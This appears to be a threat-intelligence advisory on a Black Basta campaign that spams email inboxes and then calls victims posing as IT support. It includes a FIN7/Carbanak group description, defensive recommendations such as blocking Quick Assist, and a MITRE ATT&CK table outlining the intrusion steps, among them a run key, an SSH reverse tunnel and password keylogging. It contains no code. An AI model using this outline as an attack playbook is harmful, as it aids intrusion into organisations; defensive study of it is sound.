
Black Basta is Bombarding Organisations with Fake Emails and Phone Calls
Indicators of Compromise
APT Groups1
<b>Description of MISP:</b> Groups targeting financial organizations or people with significant financial assets.<br><br><b>Description of Mitre:</b> Carbanak is a threat group that mainly targets banks. It also refers to malware of the same name (Carbanak). It is sometimes referred to as FIN7, but these appear to be two groups using the same Carbanak malware and are therefore tracked separately. [1] [2]<br><br><b>Description of Etda:</b> FIN7 is a financially-motivated threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. They often use point-of-sale malware. A portion of FIN7 was run out of a front company called Combi Security. FIN7 is sometimes referred to as {{Carbanak, Anunak}}, but these appear to be two groups using the same Carbanak malware and are therefore tracked separately. The reports about arrests made of the mastermind of Carbanak instead of FIN7. However, security research teams keep referring to this arrest for all FIN7 activities since.<br><br>
Campaign Guidance
Remediation, mitigation, notes, history and related intelligence
RECOMMENDATIONS
Steps to Enhance Cybersecurity
In response to recent cyber attacks, the following steps are recommended to protect your organization:
1. Baseline Your Environment and Use Application Allowlisting
Evaluate your environment by baselining all installed remote monitoring and management (RMM) solutions. Utilize application allowlisting solutions such as AppLocker or Microsoft Defender Application Control to block the execution of all unapproved RMM solutions. For instance, the Quick Assist tool (quickassist.exe) can be blocked from executing via AppLocker. Additionally, it is important to block domains associated with all unapproved RMM solutions. A public GitHub repository provides a catalog of RMM solutions, their binary names, and associated domains.
2. User Awareness and Communication Channels
Ensure that users are aware of the established IT channels and communication methods within your organization to recognize and prevent common social engineering attacks. It is also recommended that users be encouraged to report any suspicious phone calls and texts claiming to be from internal IT staff.
These steps will help your organization become more resilient against cyber attacks and enable users to identify and report suspicious activities effectively.
MITRE ATT&CK Techniques
Tactic | Technique | Procedure |
Denial of Service | T1498: Network Denial of Service | The threat actor overwhelms email protection solutions with spam. |
Initial Access | T1566.004: Phishing: Spearphishing Voice | The threat actor calls impacted users and pretends to be a member of their organization’s IT team to gain remote access. |
Execution | T1059.003: Command and Scripting Interpreter: Windows Command Shell | The threat actor executes batch script after establishing remote access to a user’s asset. |
Execution | T1059.001: Command and Scripting Interpreter: PowerShell | Batch scripts used by the threat actor execute certain commands via PowerShell. |
Persistence | T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | The threat actor creates a run key to execute a batch script via PowerShell, which then attempts to establish a reverse tunnel via SSH. |
Defense Evasion | T1222.001: File and Directory Permissions Modification: Windows File and Directory Permissions Modification | The threat actor uses cacls.exe via batch script to modify file permissions. |
Defense Evasion | T1140: Deobfuscate/Decode Files or Information | The threat actor encrypted several zip archive payloads with the password “qaz123”. |
Credential Access | T1056.001: Input Capture: Keylogging | The threat actor runs a batch script that records the user’s password via command line input. |
Discovery | T1033: System Owner/User Discovery | The threat actor uses whoami.exe to evaluate if the impacted user is an administrator or not. |
Lateral Movement | T1570: Lateral Tool Transfer | Impacket was used to move payloads between compromised systems. |
Command and Control | T1572: Protocol Tunneling |
An SSH reverse tunnel is used to provide the threat actor with persistent remote access. |